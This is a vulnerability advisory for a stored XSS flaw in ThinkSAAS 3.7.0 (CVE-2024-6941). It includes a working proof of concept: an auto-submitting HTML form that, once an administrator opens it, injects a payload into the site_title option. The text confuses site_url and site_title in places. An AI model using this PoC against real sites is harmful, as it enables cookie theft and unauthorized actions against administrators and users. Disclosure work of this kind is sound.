ThinkSAAS 3.7.0 has a storage XSS vulnerability

[Hebing123]

Summary

The ThinkSAAS 3.7.0 application contains a storage XSS vulnerability caused by insufficient sanitization of user input. Specifically, the parameters site_title, site_subtitle, site_key, site_desc, site_url, site_email, and site_icp are not properly filtered for malicious code in app/system/action/do.php. An attacker can exploit this issue by injecting malicious payloads into these parameters, leading to the execution of arbitrary JavaScript code in the context of the user's browser.

Details

In this case, all string-type variables are not properly escaped, making them vulnerable to stored XSS attacks. For example, if we modify the site_title, then:

POC

The following example demonstrates how an attacker can exploit the vulnerability by injecting a payload into the site_title parameter: An attacker places the PoC on their own website. When the administrator opens this webpage, they unknowingly modify the site_url of their own website. Since the site_url variable is used in header.html, almost any page on the website can trigger the stored XSS vulnerability.

<html>
  <body>
    <form action="http://your-ip/index.php?app=system&ac=options&ts=do" method="POST">
      <input type="hidden" name="option[site_title]" value="&quot;&gt;hklei&#47;&#47;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

All pages that utilize the affected parameters (site_title, site_subtitle, site_icp, etc.) will be vulnerable to the XSS exploit. This can lead to unauthorized actions being taken on behalf of authenticated users, theft of session cookies, and other malicious activities.

[Hebing123]

CVE-2024-6941